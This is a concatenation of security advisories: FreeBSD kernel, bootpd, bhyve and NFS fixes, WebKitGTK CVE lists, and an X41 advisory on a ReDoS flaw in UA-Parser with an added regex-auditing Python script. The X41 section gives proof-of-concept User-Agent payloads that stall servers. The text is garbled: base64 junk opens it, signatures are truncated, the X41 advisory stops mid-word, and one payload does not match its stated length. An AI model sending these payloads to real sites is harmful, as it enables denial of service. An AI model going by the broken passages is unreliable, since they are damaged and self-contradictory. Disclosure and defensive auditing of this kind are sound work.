2OcEbR8cZyEardSES78UBjbTwlOTVd5F4o86Q1bKytHjI72ycB5yKZkyiHmdJCjs
EhlaDC/rnHxdYGvBuiLqFcNU5tJiGawZZwyozCQz67dGD89QzKQurKEWQ1YJvMsW
ZwwJRSHrllUyJQBdqV/R3Qoaz2koeE9633jtqHDdUYKCZAgeFdic/6u9r4Rx2Nj5
JpTZU01bwvxNZPf35WbI2L+JbygR40b3FYbZ3skBqZylp+EkPGPxGpHGAxdKWeOy
rzGBukIuWnLy9pmJ574oTZymw8P
FreeBSD Security Advisory FreeBSD-SA-19:01.syscall
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

FreeBSD-SA-19:01.syscall                                    Security Advisory
                                                          The FreeBSD Project

Topic:          System call kernel data register leak

Category:       core
Module:         kernel
Announced:      2019-02-05
Credits:        Konstantin Belousov
Affects:        All supported versions of FreeBSD.
Corrected:      2019-02-05 17:52:06 UTC (stable/12, 12.0-STABLE)
                2019-02-05 18:05:05 UTC (releng/12.0, 12.0-RELEASE-p3)
                2019-02-05 17:54:02 UTC (stable/11, 11.2-STABLE)
                2019-02-05 18:07:45 UTC (releng/11.2, 11.2-RELEASE-p9)
CVE Name:       CVE-2019-5595

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <https://security.FreeBSD.org/>.

I.   Background

The FreeBSD/amd64 architecture defines the SYSCALL instruction for
syscalls, and uses register calling conventions for passing syscall
arguments and return values in addition to the register usage imposed by
the SYSCALL and SYSRET instructions in long mode.  In particular, the
arguments are passed in registers specified by the C ABI, and the content
of the registers specified as caller-save is undefined after the return
from a syscall.

II.  Problem Description

The callee-save registers are used by the kernel, and for some of them
(%r8, %r10, and for non-PTI configurations, %r9) the content is not
sanitized before return from syscalls, potentially leaking sensitive
information.

III. Impact

Typically an address of some kernel data structure used in the syscall
implementation is exposed.

IV.  Workaround

No workaround is available.

V.   Solution

Perform one of the following:

1) Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date,
and reboot.

2) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install
# shutdown -r +10m "Rebooting for security update"

3) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

[FreeBSD 12.0]
# fetch https://security.FreeBSD.org/patches/SA-19:01/syscall.patch
# fetch https://security.FreeBSD.org/patches/SA-19:01/syscall.patch.asc
# gpg --verify syscall.patch.asc

[FreeBSD 11.2]
# fetch https://security.FreeBSD.org/patches/SA-19:01/syscall.11.2.patch
# fetch https://security.FreeBSD.org/patches/SA-19:01/syscall.11.2.patch.asc
# gpg --verify syscall.11.2.patch.asc

b) Apply the patch.  Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
<https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the
system.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path                                                      Revision
- -------------------------------------------------------------------------
stable/12/                                                        r343781
releng/12.0/                                                      r343788
stable/11/                                                        r343782
releng/11.2/                                                      r343789
- -------------------------------------------------------------------------

To see which files were modified by a particular revision, run the
following command, replacing NN with the revision number, on a machine
with Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

<https://svnweb.freebsd.org/base?view=revision&revision=NN>

VII. References

<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5595>

The latest revision of this advisory is available at
<https://security.FreeBSD.org/advisories/FreeBSD-SA-19:01.syscall.asc>
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAlxZ1X9fFIAALgAo
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD
MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5MkY0OUVBN0U1QzIACgkQ05eS9J6n
5cKPZBAAlwCVtNNIuq0s8FB9LjLaVJww1WWmbVJbhw1TJyBV2yRCkWwGDLag3dJ0
EH8HwpWeL41lppjFeL6OMDZ2+wUnuShv3pAUGwodSRXsKWsp+aWqMPcNJifkVPxs
DENrziUHnXkbOnbnP25eA12j0ztCz8FjKoDh+wrjuY4BL8jzBK4ZJtmYaubrFEcD
GDStnEcvCNYDK8tf0rUW2lpv4oStTex5gFpZALPjq0g28kHPuctYzoOXOf9/So1i
0kwdstsIdgydsDCHv5nXij7IDohNo+5KEJuee1cIptKftm
X41 D-Sec GmbH Security Advisory X41-2018-009: ReDoS Vulnerability in UA-Parser
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

X41 D-SEC GmbH Security Advisory: X41-2018-009

ReDoS Vulnerability in UA-Parser

Severity Rating:             Medium
Confirmed Affected Versions: 2015-05-14 and newer, commit 6fd6c261274254bcbbacd77ef4b12534c7f9923d
Confirmed Patched Versions:  v0.6.0 released 2018-12-14, commit 010ccdc7303546cd22b9da687c29f4a996990014
Vendor:                      UA-Parser Project
Vendor URL:                  https://github.com/ua-parser
Vector:                      HTTP request
Credit:                      X41 D-SEC GmbH, Luc Gommans
Status:                      Public
CVE:                         CVE-2018-20164
CVSSv3 Score:                5.3
CVSSv3 Vector:               AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
Advisory-URL:                https://www.x41-dsec.de/lab/advisories/x41-2018-009-uaparser/

Summary and Impact
==================

The programming library UA-Parser uses regular expressions to identify user agent strings. The complexity of some of the regular expressions is such that an attacker can craft special patterns that keep the server busy for a long time. By sending many requests in short order, an attacker can exhaust the amount of processing power available. This causes the website to become unavailable for legitimate visitors.

In common setups, the user agent string is parsed whenever a page is visited. This means that anyone can abuse the bug, typically without authentication. There are no common circumstances which would prevent an attack from working reliably, i.e. an attacker can consistently and repeatedly exploit the issue until the site has become unreachable.

For more information on regular expression-based denial of service, see the OWASP page on ReDoS:
https://www.owasp.org/index.php/Regular_expression_Denial_of_Service_-_ReDoS

The UA-Parser project consists of a core repository, uap-core, and implementations in various languages. The regular expressions are defined in the core project and each implementation is automatically vulnerable.

Product Description
===================

When a user agent (such as a browser) connects to a website, it identifies itself with a 'user agent string'. This string helps the server determine relevant content, for example to serve the appropriate installer for visitors with different operating systems.

The UA-Parser project collects regular expressions that extract the type of device and operating system from these strings. Implementations in different languages are automatically vulnerable, including the reference implementation in JavaScript: <https://github.com/ua-parser/uap-ref-impl>

Proof of Concept
================

There are multiple vulnerable regular expressions. They are collected in the file regex.yaml, for example on lines 911 and 4961. The regular expression on line 911 is as follows:

    (x86_64|aarch64)\ (\d+)+\.(\d+)+\.(\d+)+.*Chrome.*(?:CitrixChromeApp)$

Any implementation using this library will hang for a few seconds (on commodity hardware) when it is sent the following HTTP request:

    GET / HTTP/1.0
    User-Agent: x86_64

Normal user agent strings can be over a hundred bytes long: this string of 35 bytes is not an abnormal request. Adding one more byte makes the processing significantly longer. This particular regular expression was introduced in September 2018.

The regular expression on line 4961 was introduced in May 2015 and can be exploited as follows:

    GET / HTTP/1.0
    User-Agent: HbbTV/1.1.1CE-HTML/1.1;THOM;SW-Version/1;SW-Version/1;SW-Version/1;SW-Version/1;SW-Version/1;SW-Version/1;SW-Version/1;SW-Version/1;SW-Version/1;SW-Version/1;LF

Each additional repetition of SW-Version/1; multiplies the processing time by a factor of roughly 6.2. Where eleven repetitions take about seven seconds, fourteen repetitions already occupy a server for half an hour.

Workarounds
===========

As demonstrated, the input does not have to be particularly long to exploit the issue. Limiting input length may still help in some cases, since a few hundred kilobytes of input slow down most regular expressions, but a maximum length is not a solution by itself. The root cause is the regular expression, which should be limited in complexity. This involves manual work and there is no solution that can be applied to all regular expressions in the project. To aid in identifying problematic regular expressions, one may use projects such as <https://github.com/jagracey/RegEx-DoS>.

Timeline
========

2018-11-26 Issue found.
2018-11-29 Permission from customer to disclose to upstream.
2018-11-29 Requested secure channel from vendor for communication.
2018-12-04 Disclosed to vendor.
2018-12-14 Patch released by vendor, CVE number requested.
2018-12-15 CVE-2018-20164 assigned.
2019-01-10 Advisory released.

About X41 D-SEC GmbH
====================

X41 is an expert provider for application security services. Having extensive industry experience and expertise in the area of information security, a strong core security team of world class security experts enables X41 to perform premium security services. Fields of expertise in the area of ap
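The workaround section above says the fix is to limit the complexity of each regular expression and points to external tooling for finding the problematic ones. As an added illustration (not code from X41 or from the UA-Parser project), the script below performs the core check such tools make: it parses each expression with Python's own regex parser and flags any unbounded repeat nested inside another unbounded repeat, which is exactly the `(\d+)+` shape in the line-911 expression. It contrasts that expression with a hardened rewrite that matches each version component once; the rewrite is my assumption of the intended semantics, not the upstream v0.6.0 fix, and the list of named patterns is a constructed stand-in for regex.yaml entries so the script runs offline. The vulnerable expression is only parsed, never executed against hostile input.

```python
"""Flag regular expressions with nested unbounded quantifiers (a common ReDoS shape).

Added example for the UA-Parser advisory; not code from X41 or the uap-core project.
"""
import re
from _sre import MAXREPEAT  # sentinel the stdlib regex parser uses for open-ended repeats

try:
    from re import _parser as sre_parse  # Python 3.11+
except ImportError:  # older interpreters expose the parser as a top-level module
    import sre_parse

# The expression quoted in the advisory (uap-core regex.yaml, line 911 at the time).
VULNERABLE_PATTERN = r"(x86_64|aarch64)\ (\d+)+\.(\d+)+\.(\d+)+.*Chrome.*(?:CitrixChromeApp)$"

# Assumed hardened rewrite (my own, not the project's fix): each numeric component is
# matched by a single \d+, so there is no nested repeat for the engine to backtrack over.
HARDENED_PATTERN = r"(x86_64|aarch64)\ (\d+)\.(\d+)\.(\d+).*Chrome.*(?:CitrixChromeApp)$"

REPEAT_OPS = {"MAX_REPEAT", "MIN_REPEAT", "POSSESSIVE_REPEAT"}


def _children(op, av):
    """Yield the sub-patterns nested under one node of the parsed regex."""
    name = op.name
    if name in REPEAT_OPS:                   # av = (min, max, body)
        yield av[2]
    elif name == "SUBPATTERN":               # av = (group, add_flags, del_flags, body)
        yield av[3]
    elif name == "BRANCH":                   # av = (None, [alternatives])
        yield from av[1]
    elif name in ("ASSERT", "ASSERT_NOT"):   # av = (direction, body)
        yield av[1]
    elif name == "ATOMIC_GROUP":             # av = body (Python 3.11+)
        yield av
    elif name == "GROUPREF_EXISTS":          # av = (group, yes_body, no_body_or_None)
        for body in av[1:]:
            if body is not None:
                yield body


def _walk(subpattern, enclosing, findings):
    """Record every unbounded repeat that sits inside another unbounded repeat."""
    for op, av in subpattern:
        depth = enclosing
        if op.name in REPEAT_OPS and av[1] == MAXREPEAT:
            if enclosing > 0:
                findings.append(
                    f"unbounded repeat nested inside {enclosing} outer unbounded repeat(s)"
                )
            depth = enclosing + 1
        for child in _children(op, av):
            _walk(child, depth, findings)
    return findings


def find_nested_quantifiers(pattern):
    """Return a list of findings; an empty list means no nested unbounded repeat was seen."""
    return _walk(sre_parse.parse(pattern), 0, [])


def audit(patterns):
    """Map each named pattern to its findings; names with findings need manual review."""
    return {name: find_nested_quantifiers(p) for name, p in patterns.items()}


def flagged_names(patterns):
    """Sorted names of the patterns that triggered at least one finding."""
    return sorted(name for name, hits in audit(patterns).items() if hits)


# Constructed stand-in for a handful of regex.yaml entries (not the real file).
SAMPLE_PATTERNS = {
    "citrix_chrome_911": VULNERABLE_PATTERN,
    "citrix_chrome_hardened": HARDENED_PATTERN,
    "simple_version": r"Chrome/(\d+)\.(\d+)",
    "nested_alternation": r"^(?:(a|b)+)+$",
}


def hardened_still_matches(user_agent):
    """Sanity check that the rewrite keeps matching the user agents it is meant for."""
    return re.search(HARDENED_PATTERN, user_agent) is not None


if __name__ == "__main__":
    for name, hits in audit(SAMPLE_PATTERNS).items():
        print(f"{name}: {'REVIEW' if hits else 'ok'} {hits}")
    # Constructed user agent in the shape the rewritten expression expects.
    print(hardened_still_matches("x86_64 70.0.3538 Chrome/70.0 CitrixChromeApp"))
```

The check is deliberately syntactic: a nested unbounded repeat is sufficient for catastrophic backtracking only when the inner and outer repeats can match the same characters, so every flagged pattern still needs a human to decide whether the overlap is real. That is the manual work the advisory refers to; the script only narrows down which of several thousand expressions deserve it.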
FreeBSD Security Advisory FreeBSD-SA-18:15.bootpd
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

FreeBSD-SA-18:15.bootpd                                     Security Advisory
                                                          The FreeBSD Project

Topic:          bootpd buffer overflow

Category:       core
Module:         bootpd
Announced:      2018-12-19
Credits:        Reno Robert
Affects:        All supported versions of FreeBSD.
Corrected:      2018-12-19 18:17:59 UTC (stable/12, 12.0-STABLE)
                2018-12-19 18:21:07 UTC (releng/12.0, 12.0-RELEASE-p1)
                2018-12-19 18:19:15 UTC (stable/11, 11.2-STABLE)
                2018-12-19 18:22:25 UTC (releng/11.2, 11.2-RELEASE-p7)
CVE Name:       CVE-2018-17161

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <https://security.FreeBSD.org/>.

I.   Background

The bootpd utility implements an Internet Bootstrap Protocol (BOOTP)
server as defined in RFC951, RFC1532, and RFC1533.

II.  Problem Description

Due to insufficient validation of network-provided data it may be possible
for a malicious attacker to craft a bootp packet which could cause a stack
buffer overflow.

III. Impact

It is possible that the buffer overflow could lead to a Denial of Service
or remote code execution.

IV.  Workaround

Firewall rules may be used to limit reception of bootp packets to only
trusted networks or hosts.  Note that the bootp protocol is typically
limited to a common layer 2 broadcast domain, although the bootpgw gateway
can forward bootp requests and responses between subnets.

V.   Solution

Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date.
Restart bootpd if it is running in standalone mode.

Perform one of the following:

1) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

2) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

# fetch https://security.FreeBSD.org/patches/SA-18:15/bootpd.patch
# fetch https://security.FreeBSD.org/patches/SA-18:15/bootpd.patch.asc
# gpg --verify bootpd.patch.asc

b) Apply the patch.  Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile the operating system using buildworld and installworld as
described in <https://www.FreeBSD.org/handbook/makeworld.html>.

Restart the applicable daemons, or reboot the system.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path                                                      Revision
- -------------------------------------------------------------------------
stable/12/                                                        r342228
releng/12.0/                                                      r342230
stable/11/                                                        r348229
releng/11.2/                                                      r342231
- -------------------------------------------------------------------------

To see which files were modified by a particular revision, run the
following command, replacing NN with the revision number, on a machine
with Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

<https://svnweb.freebsd.org/base?view=revision&revision=NN>

VII. References

<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17161>

The latest revision of this advisory is available at
<https://security.FreeBSD.org/advisories/FreeBSD-SA-18:15.bootpd.asc>
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAlwane5fFIAALgAo
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD
MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5MkY0OUVBN0U1QzIACgkQ05eS9J6n
5cKfzg/+PhmA1AKfXFSkeJJPvdF/7hjKpWaCdVAyUZsuWH5L1Tmb4Lc/pLjw22Ba
Xh/sAKik6pa/nVTZCBgAqoCqmV8CdhScwvRZdVSP5CQ9vnM+6fFcybP0aCZOmiJC
NGAE8nIBdazqWJfNM9HUSIbdqEOtMlVcyE0Ni/TxzcAFdzFowfDnyRm1wqI4zhM7
YL7pU0kTYJfydjK540rHB1tNBaYHSJ/6ckK3tkjwjVgMsQwNSizKrPsqycoMlMmD
TqQMfDwU8W/jFLsr7OZE66eQBysSiuzYAv3IsipL+50SYgS0aoo3LwKrCcYGN6c/
S/0SOfNHDgd/7wregI5adKqWJceaqZCVedSVLm6ZaG1Vt3alIjczX9D7wIjuXPlD
AkSKa0HnmSwDC8yWLJYMxuny7vy3uBAUnPiwIT3RrsDC0b28/uwNPbeSbG0Wrf9F
21PDMfeCPc2Vr/TVj9uSIo20pNtVhy+tGbx1Ilsgi3POa3n7pTOuFWHMzQVe3rZA
DLYEbliPxpq9NFJ/2UZQg25weOD5ygwaYZnbsXAMY47D4kteeQOjzomgiacVhE56
oT8z804nGgGdCe4LpiHihDVzCbBvvuEPw9Edffzm7E
WebKitGTK+ and WPE WebKit Security Advisory WSA-2018-0009
WebKitGTK+ and WPE WebKit Security Advisory                  WSA-2018-0009

Date reported           : December 13, 2018
Advisory ID             : WSA-2018-0009
WebKitGTK+ Advisory URL : https://webkitgtk.org/security/WSA-2018-0009.html
WPE WebKit Advisory URL : https://wpewebkit.org/security/WSA-2018-0009.html
CVE identifiers         : CVE-2018-4437, CVE-2018-4438, CVE-2018-4441,
                          CVE-2018-4442, CVE-2018-4443, CVE-2018-4464.

Several vulnerabilities were discovered in WebKitGTK+ and WPE WebKit.

CVE-2018-4437
    Versions affected: WebKitGTK+ before 2.22.5 and WPE WebKit before 2.22.3.
    Credit to HyungSeok Han, DongHyeon Oh, and Sang Kil Cha of KAIST Softsec Lab, Korea.
    Processing maliciously crafted web content may lead to arbitrary code execution.
    Multiple memory corruption issues were addressed with improved memory handling.

CVE-2018-4438
    Versions affected: WebKitGTK+ before 2.22.3 and WPE WebKit before 2.22.1.
    Credit to lokihardt of Google Project Zero.
    Processing maliciously crafted web content may lead to arbitrary code execution.
    A logic issue existed resulting in memory corruption. This was addressed with improved state management.

CVE-2018-4441
    Versions affected: WebKitGTK+ before 2.22.3 and WPE WebKit before 2.22.1.
    Credit to lokihardt of Google Project Zero.
    Processing maliciously crafted web content may lead to arbitrary code execution.
    A memory corruption issue was addressed with improved memory handling.

CVE-2018-4442
    Versions affected: WebKitGTK+ before 2.22.3 and WPE WebKit before 2.22.1.
    Credit to lokihardt of Google Project Zero.
    Processing maliciously crafted web content may lead to arbitrary code execution.
    A memory corruption issue was addressed with improved memory handling.

CVE-2018-4443
    Versions affected: WebKitGTK+ before 2.22.3 and WPE WebKit before 2.22.1.
    Credit to lokihardt of Google Project Zero.
    Processing maliciously crafted web content may lead to arbitrary code execution.
    A memory corruption issue was addressed with improved memory handling.

CVE-2018-4464
    Versions affected: WebKitGTK+ and WPE WebKit before 2.22.0.
    Credit to HyungSeok Han, DongHyeon Oh, and Sang Kil Cha of KAIST Softsec Lab, Korea.
    Processing maliciously crafted web content may lead to arbitrary code execution.
    Multiple memory corruption issues were addressed with improved memory handling.

We recommend updating to the latest stable versions of WebKitGTK+ and WPE WebKit. It is the best way to ensure that you are running safe versions of WebKit. Please check our websites for information about the latest stable releases.

Further information about WebKitGTK+ and WPE WebKit security advisories can be found at: https://webkitgtk.org/security.html or https://wpewebkit.org/security/.

The WebKitGTK+ and WPE WebKit team,
December 13, 2018
FreeBSD Security Advisory FreeBSD-SA-18:14.bhyve
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

FreeBSD-SA-18:14.bhyve                                      Security Advisory
                                                          The FreeBSD Project

Topic:          Insufficient bounds checking in bhyve(8) device model

Category:       core
Module:         bhyve
Announced:      2018-12-04
Credits:        Reno Robert
Affects:        All supported versions of FreeBSD.
Corrected:      2018-12-04 18:32:50 UTC (stable/11, 11.2-STABLE)
                2018-12-04 18:38:32 UTC (releng/11.2, 11.2-RELEASE-p6)
CVE Name:       CVE-2018-17160

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <https://security.FreeBSD.org/>.

I.   Background

The bhyve hypervisor uses the bhyve(8) program to emulate support for most
virtual devices used by guest operating systems.

II.  Problem Description

Insufficient bounds checking in one of the device models provided by
bhyve(8) can permit a guest operating system to overwrite memory in the
bhyve(8) process, possibly permitting arbitrary code execution.

III. Impact

A guest OS using a firmware image can cause the bhyve process to crash, or
possibly execute arbitrary code on the host as root.

IV.  Workaround

The device model in question is only enabled when booting guests with a
firmware image such as the UEFI images from the bhyve-firmware package.
Guests booted using bhyveload(8) or grub2-bhyve are not affected.

Guests using operating systems supported by bhyveload(8) or grub2-bhyve can
be booted using these tools as a workaround.  No workaround is available
for guest operating systems such as Windows that require a firmware image.

V.   Solution

Perform one of the following:

Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date.

1) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

Afterward, restart guests using firmware images.

2) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

# fetch https://security.FreeBSD.org/patches/SA-18:14/bhyve.patch
# fetch https://security.FreeBSD.org/patches/SA-18:14/bhyve.patch.asc
# gpg --verify bhyve.patch.asc

b) Apply the patch.  Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile the operating system using buildworld and installworld as
described in <https://www.FreeBSD.org/handbook/makeworld.html>.

Afterward, restart guests using firmware images.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path                                                      Revision
- -------------------------------------------------------------------------
stable/11/                                                        r341486
releng/11.2/                                                      r341488
- -------------------------------------------------------------------------

To see which files were modified by a particular revision, run the
following command, replacing NN with the revision number, on a machine
with Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

<https://svnweb.freebsd.org/base?view=revision&revision=NN>

VII. References

<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17160>

The latest revision of this advisory is available at
<https://security.FreeBSD.org/advisories/FreeBSD-SA-18:14.bhyve.asc>
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAlwGykdfFIAALgAo
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD
MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5MkY0OUVBN0U1QzIACgkQ05eS9J6n
5cKcIQ/+Ktt7+SZPoWZQmJv6LdT6qI+na0+/9LDwBoC+Tj37heFUnhcMTxDDH4o3
nexELxF1xHmRchooRKfJr7npa8CF4jBzp2PSb+783q6TrFKe90ohlmt56lRB6gJg
3IJX5TxvAvLsqTgwPyALqyy3H5C8cY3btHPsZIArK0WVRTB74K3mr3L3IRVTcMCv
9cbUZyDO21ZIDTB5h9FYGo+6bg8hvZztmromkxssqlKKS8TUltGr/H3k6EHlnEA9
rG+6kswIgyeXNFrdksD6ni7L5Z3lwR/DFiU2d/lageQZ6vgDUa3c0KMhepfelfJR
AiUtGpgfCDuHZ1NV2uyr9I6nPRHhdxPy3o2bF/B7+SLdn03tcZiO0tx3Wf68EQlt
jAYFuup7+TFKoupsHlb2fkQxNOeQCr6dF+ikJDVgwCqmx2zn9tDo/tWoNdH+Jylx
MDKsE369HOSRGR3Ua1ELEtOEzbGbcUHJyT6I1E2poctE61hYI+5te6pasY3ReN68
vyFMAo5ey0kJ6mi2YVcvDo2ZEb/GP1noJkdquYpIm8Ko0TPtivaMHXLIPcpLiJUc
fBZexGCXJnb8f6ClMMU12U6f3H35Hz1AUPG3MSWHGgoczQBZJ
FreeBSD Security Advisory FreeBSD-SA-18:13.nfs
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

FreeBSD-SA-18:13.nfs                                        Security Advisory
                                                          The FreeBSD Project

Topic:          Multiple vulnerabilities in NFS server code

Category:       core
Module:         nfs
Announced:      2018-11-27
Credits:        Jakub Jirasek, Secunia Research at Flexera
Affects:        All supported versions of FreeBSD.
Corrected:      2018-11-23 20:41:54 UTC (stable/11, 11.2-STABLE)
                2018-11-27 19:42:16 UTC (releng/11.2, 11.2-RELEASE-p5)
CVE Name:       CVE-2018-17157, CVE-2018-17158, CVE-2018-17159

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <https://security.FreeBSD.org/>.

I.   Background

The Network File System (NFS) allows a host to export some or all of its
file systems so that other hosts can access them over the network and mount
them as if they were local.  FreeBSD includes both server and client
implementations of NFS.

II.  Problem Description

Insufficient and improper checking in the NFS server code could cause a
denial of service or possibly remote code execution via a specially crafted
network packet.

III. Impact

A remote attacker could cause the NFS server to crash, resulting in a
denial of service, or possibly execute arbitrary code on the server.

IV.  Workaround

No workaround is available, but systems that do not provide NFS services
are not vulnerable.

Additionally, it is highly recommended the NFS service port (default port
number 2049) is protected via a host or network based firewall to prevent
arbitrary, untrusted clients from being able to connect.

V.   Solution

Perform one of the following:

1) Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date.

Afterward, reboot the system.

2) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

Afterward, reboot the system.

3) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

[FreeBSD 11.2]
# fetch https://security.FreeBSD.org/patches/SA-18:13/nfs.patch
# fetch https://security.FreeBSD.org/patches/SA-18:13/nfs.patch.asc
# gpg --verify nfs.patch.asc

b) Apply the patch.  Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
<https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the
system.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path                                                      Revision
- -------------------------------------------------------------------------
stable/11/                                                        r340854
releng/11.2/                                                      r341088
- -------------------------------------------------------------------------

To see which files were modified by a particular revision, run the
following command, replacing NN with the revision number, on a machine
with Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

<https://svnweb.freebsd.org/base?view=revision&revision=NN>

VII. References

<https://www.flexerasoftware.com/enterprise/company/about/secunia-research/>
<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17157>
<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17158>
<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17159>

The latest revision of this advisory is available at
<https://security.FreeBSD.org/advisories/FreeBSD-SA-18:13.nfs.asc>
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAlv9n85fFIAALgAo
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD
MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5MkY0OUVBN0U1QzIACgkQ05eS9J6n
5cKJEg//Umbe1QOUgV0Z6EsdlQffNMo9MHbAz75vCqeaibI36Ng9vmkLKGlS6nCA
5mKFS+BvM5CkekBaiQ6BR8t0xWsrFwX6JCUayQ2FsCSo4rwCZms3AIbvt68vjQAm
xWuQIMJzYku5+kALtcXXvVkLhMCaioVDpZmuPCO+rY79OVM4xP1MsnTfqEZSNo+n
Cz2urH4eO60YsM8w05coQ3hnOsUjTCk8yCh3+R/uYK1VouLDgD8q96T1eG2ozny6
vwEMK3AjmcpvFkTIF3/2I6TTA5K+Zd+nqzhzPM5HjbLZmdQV02NHcoGaZrK1wsQw
D+3wf8icBMfLt9rTUbEqVdvg5FRDkTo8/dH1wY85gWZ2wsSgCqI2wRuqBH4bp3bb
Gcf2+D4vgX6YY5cZ/wFDcYWpghhrmXUbgnH7PnyVfYB0Ufta9utgMOQKMS0mUWwM
DlHP+fL/A8lhPvXIhl1DtSa/TQAiAdMG1
WebKitGTK+ and WPE WebKit Security Advisory WSA-2018-0008
WebKitGTK+ and WPE WebKit Security Advisory                  WSA-2018-0008

Date reported           : November 21, 2018
Advisory ID             : WSA-2018-0008
WebKitGTK+ Advisory URL : https://webkitgtk.org/security/WSA-2018-0008.html
WPE WebKit Advisory URL : https://wpewebkit.org/security/WSA-2018-0008.html
CVE identifiers         : CVE-2018-4345, CVE-2018-4372, CVE-2018-4373,
                          CVE-2018-4375, CVE-2018-4376, CVE-2018-4378,
                          CVE-2018-4382, CVE-2018-4386, CVE-2018-4392,
                          CVE-2018-4416.

Several vulnerabilities were discovered in WebKitGTK+ and WPE WebKit.

CVE-2018-4345
    Versions affected: WebKitGTK+ before 2.22.3 and WPE WebKit before 2.22.1.
    Credit to an anonymous researcher.
    A cross-site scripting issue existed in WebKit.
    This issue was addressed with improved URL validation.

CVE-2018-4372
    Versions affected: WebKitGTK+ before 2.22.4 and WPE WebKit before 2.22.2.
    Credit to HyungSeok Han, DongHyeon Oh, and Sang Kil Cha of KAIST Softsec Lab, Korea.
    Processing maliciously crafted web content may lead to arbitrary code execution.
    Multiple memory corruption issues were addressed with improved memory handling.

CVE-2018-4373
    Versions affected: WebKitGTK+ and WPE WebKit before 2.22.0.
    Credit to ngg, alippai, DirtYiCE, KT of Tresorit working with Trend Micro's Zero Day Initiative.
    Processing maliciously crafted web content may lead to arbitrary code execution.
    Multiple memory corruption issues were addressed with improved memory handling.

CVE-2018-4375
    Versions affected: WebKitGTK+ before 2.22.1 and WPE WebKit before 2.22.0.
